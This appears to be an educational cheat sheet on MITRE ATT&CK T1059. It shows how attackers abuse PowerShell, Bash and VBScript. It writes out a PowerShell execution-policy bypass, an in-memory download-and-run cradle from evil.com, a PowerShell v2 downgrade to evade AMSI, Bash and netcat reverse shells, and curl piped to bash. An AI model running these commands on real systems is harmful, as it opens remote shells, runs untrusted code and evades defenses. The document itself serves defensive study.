Command and Scripting Interpreter (T1059)
Adversaries abuse these to execute commands without dropping binaries.
1. PowerShell (Windows)
The most powerful tool on Windows.
Execution Policy Bypass
The "Execution Policy" is a user safety feature, NOT a security boundary.
powershell -ExecutionPolicy Bypass -File script.ps1
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')"
In-Memory Execution (Fileless)
Running code directly from RAM.
$code = 'Create-Thread...';
Invoke-Expression $code;
Evasion: Downgrade Attack
PowerShell v2.0 does not support AMSI (Anti-Malware Scan Interface) or Script Block Logging.
powershell -version 2
Mitigation: Uninstall PowerShell v2.0 on all endpoints.
2. Bash / Sh (Linux)
The standard for Linux post-exploitation.
Reverse Shells
# Bash TCP
bash -i >& /dev/tcp/10.0.0.1/443 0>&1
# Fifo Pipe (creates a file)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f
Fileless Execution
Executing a script from URL without saving to disk.
curl https://evil.com/script.sh | bash
3. Visual Basic (VBScript / JScript)
Often used in dropped files (User Execution).
- HTA (HTML Application): Executes via
mshta.exe. - WScript: Executing
.vbsfiles.
